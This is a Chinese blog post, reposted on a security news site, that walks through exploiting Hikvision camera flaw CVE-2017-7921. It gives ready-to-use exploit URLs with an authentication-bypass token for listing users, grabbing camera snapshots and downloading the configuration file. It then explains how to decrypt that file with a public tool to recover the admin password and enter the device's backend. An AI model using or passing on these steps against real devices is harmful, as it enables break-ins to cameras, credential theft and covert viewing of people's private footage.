海康威视CVE-2017-7921的一次实战利用

admin 2023年6月8日18:04:37海康威视CVE-2017-7921的一次实战利用已关闭评论285 views字数 885阅读2分57秒阅读模式

更多精彩推荐,请关注我们
0x00 前言
图片

        最近在在项目中遇到了海康威视,然后爆破了一下admin的弱口令,没成功,然后就想到了CVE-2017-7921这个漏洞,这里就对我在实际中利用这个漏洞进行总结记录

0x01 弱口令一出谁与针锋
图片

        先找到了这个海康威视的网站,找到这个网站,心里开心的一批,脸上一下就漏出了“猥琐”的笑脸。可是一波海康威视的默认口令admin:12345没成功。


图片



0x02 没有弱口令就CVE
图片

        弱口令不行,就只有试试CVE了,网上一搜海康威视漏洞,出来的最多的就是CVE-2017-7921

CVE-2017-7921的exp有如下三个:

  • 检索所有用户及其角色的列表

    http://camera.ip/Security/users?auth=YWRtaW46MTEK

图片

        用户名还是默认用户admin    

  • 在没有身份验证的情况下获取摄像头快照

http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

图片

        因为涉及到摄像头隐私,这里打码比较严重

  • 下载摄像头配置账号密码文件

http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
图片

用hex编辑器打开下载的configurationFile文件发现是加密后的




0x03 解密configurationFile
图片

        在github上找到一个师傅写的解密程序Hikvision Decrypter:https://github.com/WormChickenWizard/hikvision-decrypter

图片

下载后我们加载解密这个configurationFile文件,然后用hex编辑器搜索admin,即可发现密码

图片

这里记得要选Encrypted

图片

解密以后,点击Save

使用十六进制编辑器或者记事本打开解密以后的文件,搜索admin可以找到密码

图片
0x04 进入后台
图片

进入后台,查看配置

图片

图片

secteam公众号

微信搜索 : secteam

长按识别二维码关注

图片

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月8日18:04:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   海康威视CVE-2017-7921的一次实战利用https://cn-sec.com/archives/1788403.html